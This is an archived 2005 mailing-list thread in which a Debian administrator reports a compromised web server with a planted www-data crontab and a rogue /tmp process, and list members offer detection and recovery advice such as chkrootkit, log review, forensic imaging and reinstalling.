Re: a compromised machine

2005-07-26 Thread Davide Prina
Nejc Novak ha scritto: So, for now i killed this process, disabled the cronjob and killed web server - there is now way the attacker is capable of coming back into server or is there a chance that there is another backdoor installed somewhere (chkrootkit doesn't find anything). try also rk

RE: a compromised machine

2005-07-26 Thread Simon Allard
Kernel root kits are very good at hiding themselves when they are running. Best way is to mount the had drive in another box as /mnt or something and run chkrootkit over it and also md5sum known hacked binaries like ls etc. > OK :) > > So, for now i killed this process, disabled the cronjob an

Re: a compromised machine

2005-07-26 Thread Nejc Novak
OK :) So, for now i killed this process, disabled the cronjob and killed web server - there is now way the attacker is capable of coming back into server or is there a chance that there is another backdoor installed somewhere (chkrootkit doesn't find anything). Nejc Marcin Owsiany wrote:

Re: a compromised machine

2005-07-26 Thread Nejc Novak
Can you also define, what it does? Or what was the attacker capable of doing with it? Thanks.. Edward Faulkner wrote: On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: It's attempting to connect to two different hosts: Never mind that second address... that's my DNS.

Re: a compromised machine

2005-07-26 Thread Marcin Owsiany
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: > On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote: > > Can you get any information out of this cron file? I tried creating the > > same exec that this file creats, but obiously i was doing sth wrong :) > > The crontab wri

Re: a compromised machine

2005-07-26 Thread Edward Faulkner
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: > It's attempting to connect to two different hosts: Never mind that second address... that's my DNS... signature.asc Description: Digital signature

Re: a compromised machine

2005-07-26 Thread Edward Faulkner
On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote: > Can you get any information out of this cron file? I tried creating the > same exec that this file creats, but obiously i was doing sth wrong :) The crontab writes out a binary file and executes it. I straced the binary on a virtual m

Re: a compromised machine

2005-07-26 Thread Nejc Novak
Hi again! I found out how the process is started. There was a file created - /var/spool/cron/crontabs/www-data. I hope that its ok if i post it here as attachment. The creation of file was 21.7.2005 23:55. I checked apache logs for that time but there was nothing wierd to notice. Can you get

RE: a compromised machine

2005-07-25 Thread Mathieu JANIN
Re: a compromised machine Le 12989ième jour après Epoch, Nejc Novak écrivait: > i checked crontabs and i haven't found anything. but new processess started > > www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00 > /tmp/dlciiqlno x > www-data 6762 0.0 0.0 00 ?

Re: a compromised machine

2005-07-24 Thread François TOURDE
Le 12989ième jour après Epoch, Nejc Novak écrivait: > i checked crontabs and i haven't found anything. but new processess started > > www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00 > /tmp/dlciiqlno x > www-data 6762 0.0 0.0 00 ?Z22:10 0:00 [sh] > > www-dat

Re: a compromised machine

2005-07-24 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote: > I still haven't managed to find out how exactly this happened. And > probably reinstall will be needed? What do you think? Yes, reinstall on compromised hosts is always needed, however you should make a image of the system for forensic, you dont want t

Re: a compromised machine

2005-07-24 Thread JM
Reinstall seems the option left...with the added security features discussed previously, monitoring the server closely after new installation. I would do the new installation in a new hard disk, saving and afterwards, installing the seemingly compromised hard disk, for a forensic analysis in a mac

Re: a compromised machine

2005-07-24 Thread Nejc Novak
i checked crontabs and i haven't found anything. but new processess started www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00 /tmp/dlciiqlno x www-data 6762 0.0 0.0 00 ?Z22:10 0:00 [sh] www-data 6770 0.0 0.1 1624 608 ?S22:10 0:00 [bdflu

Re: a compromised machine

2005-07-24 Thread Ulf Harnhammar
On Sun, Jul 24, 2005 at 07:40:21PM +0200, Nejc Novak wrote: > that means, that the process was started at 17:31 today. So i checked > I killed the process and webserver and at 19:31 the process again > started with the same lines in syslog. Check your crontabs (in various locations) and atq. It

Re: a compromised machine

2005-07-24 Thread Nejc Novak
Thanks for your help. I didn't make much progress though. However, after killing all these processes, a new one was run www-data 6059 0.0 0.1 1616 600 ?S17:31 0:00 /tmp/dlciiqlno x that means, that the process was started at 17:31 today. So i checked logs (all virtual serv

Re: a compromised machine

2005-07-24 Thread Steve Kemp
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote: > Since the process runs as "www-data" some kiddy has abused a web service > on your server to download and run an external software. Look for > suspicious log lines of your web server. Yes .. > Examples of hacks on our servers: >

Re: a compromised machine

2005-07-24 Thread Geoff Crompton
Christoph Haas wrote: > On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote: > It should be rather easy finding signs of weird accesses like %20 or > chr(). Also look for weird signs in /tmp. > > If your server is important you should consider reinstalling. I'd urge you to spend the time

Re: a compromised machine

2005-07-24 Thread Christoph Haas
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote: > I think one of my servers has been compromised. Since i don't have a lot > of experiencei with these things, i beg you for your help. > > Information i have gathered together till now are the following. Server > is runnin latest debia

a compromised machine

2005-07-24 Thread Nejc Novak
Hi! I think one of my servers has been compromised. Since i don't have a lot of experiencei with these things, i beg you for your help. Information i have gathered together till now are the following. Server is runnin latest debian stable, sarge. There was heavy traffic on the server and ps